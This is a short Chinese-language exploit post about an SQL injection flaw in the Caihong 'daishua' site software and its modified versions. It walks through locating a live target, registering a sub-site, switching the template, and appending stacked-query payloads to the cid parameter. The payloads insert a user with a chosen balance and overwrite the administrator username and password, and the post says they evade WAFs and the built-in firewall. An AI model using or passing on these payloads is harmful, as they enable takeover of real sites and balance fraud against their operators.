彩虹代刷网及二改系统SQL注入漏洞

本文介绍彩虹代刷网及其二改系统中存在的SQL注入漏洞，并提供绕过常见防护的Payload。

漏洞利用步骤

1. 寻找目标网站：首先，找一个代刷网网站（注意：大部分卖挂网站已修复此漏洞）。
2. 注册分站：注册一个分站账号。
3. 进入分站后台：登录后进入分站管理后台。
4. 修改模板：在“网站信息设置”中，将“自定义分站模板”改为 argon。
5. 访问首页并注入：访问你的分站首页，并在URL后添加Payload。例如：

   http://a.cn/?cid=1;insert%20into%20pre_site%20set%20zid='01124'%2Cuser='gainxy'%2Cpwd='031124'%2Crmb='115.5'%2Cstatus='1'

提供的Payload（可绕过服务器商WAF及彩虹源码自带防火墙）

• 创建用户：
  text 复制

  1

  ?cid=1;replace%20into%20pre_site%20set%20zid='数字(随便写)'%2Cuser='用户名'%2Cpwd='密码'%2Crmb='余额'%2Cstatus='1'

• 修改后台密码（需知道后台路径）：
  依次执行以下三个Payload：
  1. ?cid=1;replace%20into%20pre_config%20(k%2Cv)%20values%20(%27admin_pwd%27%2C%27密码%27)
  2. ?cid=1;replace%20into%20pre_config%20(k%2Cv)%20values%20(%27admin_user%27%2C%27账号%27)
  3. ?cid=1;replace%20into%20pre_cache%20(k%2Cv)%20values%20(%27config%27%2C%27a%27)

注意：不知道后台路径时如何进入后台的方法暂不分享，该方法涉及SQL与XSS结合，后续会单独发布。